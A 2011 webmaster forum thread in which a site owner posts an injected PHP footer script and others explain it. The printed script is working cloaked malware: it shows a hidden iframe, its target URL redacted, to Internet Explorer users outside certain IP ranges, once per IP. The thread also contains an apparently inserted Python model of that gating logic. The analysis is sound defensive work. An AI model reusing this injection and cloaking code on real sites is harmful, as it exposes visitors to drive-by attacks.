Site Compromised. Need Help Understanding This Script

5:24 pm on Mar 11, 2011 (gmt 0)

Junior Member

5+ Year Member

joined:Aug 17, 2006
posts:61
votes: 0


Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?php
// The injected footer script as posted (IP ranges obscured by the moderator).
// Comments added to explain what each part does.

// True when $ip lies inside $network, written as a.b.c.d/bits or a.b.c.d/dotted-mask.
function net_match ( $network , $ip ) {
    $ip_arr = explode ( '/' , $network );
    $network_long = ip2long ( $ip_arr [ 0 ]);
    $x = ip2long ( $ip_arr [ 1 ]);
    // If the suffix is a dotted-quad mask use it directly, otherwise treat it as a prefix length.
    $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
    $ip_long = ip2long ( $ip );
    return ( $ip_long & $mask ) == ( $network_long & $mask );
}

// Returns true only when the visitor's IP is outside every listed range;
// for visitors inside any of them it returns nothing (falsy), so they never get the payload.
function net()
{
    $ip = $_SERVER['REMOTE_ADDR'];

    if(
        net_match('64.***.160.0/19',$ip)==0 &&
        net_match('66.***.0.0/20',$ip)==0 &&
        net_match('66.***.64.0/19',$ip)==0 &&
        net_match('72.***.192.0/18',$ip)==0 &&
        net_match('74.***.0.0/16',$ip)==0 &&
        net_match('89.***.224.0/24',$ip)==0 &&
        net_match('193.***.125.0/24',$ip)==0 &&
        net_match('194.***.194.0/24',$ip)==0 &&
        net_match('209.***.128.0/17',$ip)==0 &&
        net_match('216.***.32.0/19',$ip)==0 &&
        net_match('128.***.0.0/16',$ip)==0 &&
        net_match('67.***.0.0/16',$ip)==0 &&
        net_match('188.***.0.0/16',$ip)==0
    )
        return true;
}

// Sets the global $os only for visitors whose User-Agent mentions Windows.
function detect_os() {
    global $os;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}
detect_os();

// Sets the global $OOOOOO000 to "MSIE" for Internet Explorer 6, 7 or 8.
// ($OOOOO0000 is declared but never used; the look-alike names are deliberate obfuscation.)
function detect_brows() {
    global $OOOOO0000, $OOOOOO000;
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    if (preg_match("/MSIE 6.0/", $user_agent) OR
        preg_match("/MSIE 7.0/", $user_agent) OR
        preg_match("/MSIE 8.0/", $user_agent)
    ) $OOOOOO000 = "MSIE";
}
detect_brows();

// One marker file per visitor IP under /tmp/freshnews/, so each IP is served the payload only once.
$IP = "{$_SERVER['REMOTE_ADDR']}.log";

function _log()
{
    global $IP;
    touch ("/tmp/freshnews/{$IP}");
}

// True while no marker file exists for this IP (i.e. this visitor has not been served yet).
function _check()
{
    global $IP;
    if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}

// The iframe target is stored base64-encoded so it does not show up in a plain grep.
$sfkg = base64_decode('[alphanumeric string]');

// Payload is emitted only if all four gates pass: not served before, IP outside the
// listed ranges, Windows User-Agent, and Internet Explorer 6/7/8.
if(_check())
{
    if(net())
    {
        if($os)
        {
            if($OOOOOO000 == "MSIE")
            {
                // Output is JavaScript: a 1x1 invisible iframe pointing at the decoded URL.
                echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

                _log();
            }
        }
    }
}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]

5:47 pm on Mar 11, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Apr 19, 2002
posts:3171
votes: 8


It doesn't matter what it does, you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source, to Internet Explorer users who are not from the IP ranges shown.

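To make that summary concrete, here is an added Python model of the script's decision logic (example code, not from the thread or from the script's author). The three network ranges and the visitor IPs are constructed placeholders, since the moderator obscured the real ones, and a Python set stands in for the /tmp/freshnews marker files; the run shows why anyone in the listed ranges, or on a non-IE browser, never sees the iframe, and why every other IP sees it exactly once.

```python
import re
import ipaddress

# Constructed stand-in ranges; the post's real ones were obscured as "64.***.160.0/19" etc.
EXCLUDED_NETWORKS = ["203.0.113.0/24", "198.51.100.0/255.255.255.128", "192.0.2.0/24"]


def ip2long(ip: str) -> int:
    """Dotted quad -> 32-bit integer, like PHP's ip2long()."""
    return int(ipaddress.IPv4Address(ip))


def net_match(network: str, ip: str) -> bool:
    """Mirror of the script's net_match(): accepts a.b.c.d/bits or a.b.c.d/dotted-mask."""
    base, suffix = network.split("/")
    try:
        mask = ip2long(suffix)                                  # explicit dotted-quad mask
    except ValueError:
        mask = (0xFFFFFFFF << (32 - int(suffix))) & 0xFFFFFFFF  # prefix length
    return (ip2long(ip) & mask) == (ip2long(base) & mask)


def would_serve_iframe(ip: str, user_agent: str, served_ips: set) -> bool:
    """Replays the script's four gates; served_ips stands in for /tmp/freshnews/<ip>.log."""
    if ip in served_ips:                                    # _check(): one payload per IP
        return False
    if any(net_match(n, ip) for n in EXCLUDED_NETWORKS):    # net(): listed ranges never see it
        return False
    if "Windows" not in user_agent:                         # detect_os()
        return False
    if not re.search(r"MSIE [678].0", user_agent):          # detect_brows(): IE 6/7/8 only
        return False
    served_ips.add(ip)                                      # _log(): remember this IP
    return True


if __name__ == "__main__":
    served = set()
    ie7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
    for who, ip, ua in [("IE7 on Windows, first visit", "198.18.0.5", ie7),
                        ("same visitor again", "198.18.0.5", ie7),
                        ("IE7 from an excluded range", "203.0.113.9", ie7),
                        ("Firefox on Windows", "198.18.0.6", "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6")]:
        verdict = "iframe served" if would_serve_iframe(ip, ua, served) else "clean page"
        print(f"{who:30} -> {verdict}")
```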
5:52 pm on Mar 11, 2011 (gmt 0)

Junior Member

5+ Year Member

joined:Aug 17, 2006
posts:61
votes: 0


Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.

6:06 pm on Mar 11, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Oct 26, 2002
posts:3292
votes: 6


"They seem to have accessed the site via FTP"

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.
 
